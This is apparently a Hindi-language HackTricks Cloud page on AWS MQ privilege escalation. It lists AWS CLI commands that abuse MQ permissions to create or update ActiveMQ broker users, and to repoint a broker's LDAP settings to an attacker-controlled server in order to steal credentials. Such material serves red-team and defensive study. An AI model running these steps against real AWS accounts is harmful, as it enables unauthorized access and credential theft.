AWS - MQ Privesc
Reading time: 3 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें, PRs को HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में सबमिट करके।
MQ
MQ के बारे में अधिक जानकारी के लिए देखें:
mq:ListBrokers
, mq:CreateUser
इन अनुमतियों के साथ आप एक ActimeMQ ब्रोकर में एक नया उपयोगकर्ता बना सकते हैं (यह RabbitMQ में काम नहीं करता):
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
संभावित प्रभाव: ActiveMQ के माध्यम से संवेदनशील जानकारी तक पहुँच
mq:ListBrokers
, mq:ListUsers
, mq:UpdateUser
इन अनुमतियों के साथ आप एक नए उपयोगकर्ता को ActimeMQ ब्रोकर में बना सकते हैं (यह RabbitMQ में काम नहीं करता):
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
संभावित प्रभाव: ActiveMQ के माध्यम से संवेदनशील जानकारी तक पहुँच
mq:ListBrokers
, mq:UpdateBroker
यदि एक ब्रोकर ActiveMQ के साथ प्राधिकरण के लिए LDAP का उपयोग कर रहा है। तो यह संभव है कि हमलावर द्वारा नियंत्रित LDAP सर्वर की कॉन्फ़िगरेशन को बदल दिया जाए। इस तरह हमलावर LDAP के माध्यम से भेजे जा रहे सभी क्रेडेंशियल्स को चुरा सकेगा।
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...
यदि आप किसी तरह ActiveMQ द्वारा उपयोग किए गए मूल क्रेडेंशियल्स को खोज सकते हैं, तो आप एक MitM कर सकते हैं, क्रेडेंशियल्स चुरा सकते हैं, उन्हें मूल सर्वर में उपयोग कर सकते हैं, और प्रतिक्रिया भेज सकते हैं (शायद केवल चुराए गए क्रेडेंशियल्स का पुन: उपयोग करके आप यह कर सकते हैं)।
संभावित प्रभाव: ActiveMQ क्रेडेंशियल्स चुराना
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें, PRs को HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में सबमिट करके।